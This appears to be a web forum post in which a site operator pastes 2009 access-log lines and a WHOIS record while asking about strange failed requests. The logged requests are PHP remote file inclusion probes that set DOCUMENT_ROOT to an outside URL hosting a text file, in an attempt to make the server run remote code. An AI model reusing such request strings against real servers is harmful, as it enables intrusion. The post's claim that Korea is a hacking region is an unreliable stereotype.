Not sure what this nonsense is and how it is even getting directed to our server. The web addresses below are not even on our server but somehow this showed up in our logs and generating errors:
222.231.57.31 - - [04/10/2009:10:33:45 -0800] "GET /web///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 521 "-" "Mozilla/5.0" -
222.231.57.31 - - [04/10/2009:10:33:45 -0800] "GET ///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 521 "-" "Mozilla/5.0" -
222.231.57.31 - - [04/10/2009:10:33:45 -0800] "GET /web/e-commerce///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 521 "-" "Mozilla/5.0" -
222.231.57.31 - - [04/10/2009:10:33:45 -0800] "GET /web/e-commerce/paypal///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 521 "-" "Mozilla/5.0" -
222.231.57.31 - - [04/10/2009:10:33:45 -0800] "GET /web/e-commerce/paypal/PayPal.html///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.seorakhoney.com/shop/mail/id1.txt??? HTTP/1.1" 404 521 "-"
"Mozilla/5.0" -
This is coming from a common spamming/hacking part of the world - Korea:
inetnum: 222.231.0.0 - 222.231.63.255
netname: KIDC
descr: Korea Internet Data Center
descr: KIDC Bldg, 261-1, Nonhyun-dong, Kangnam-ku, Seoul, 135-010
country: KR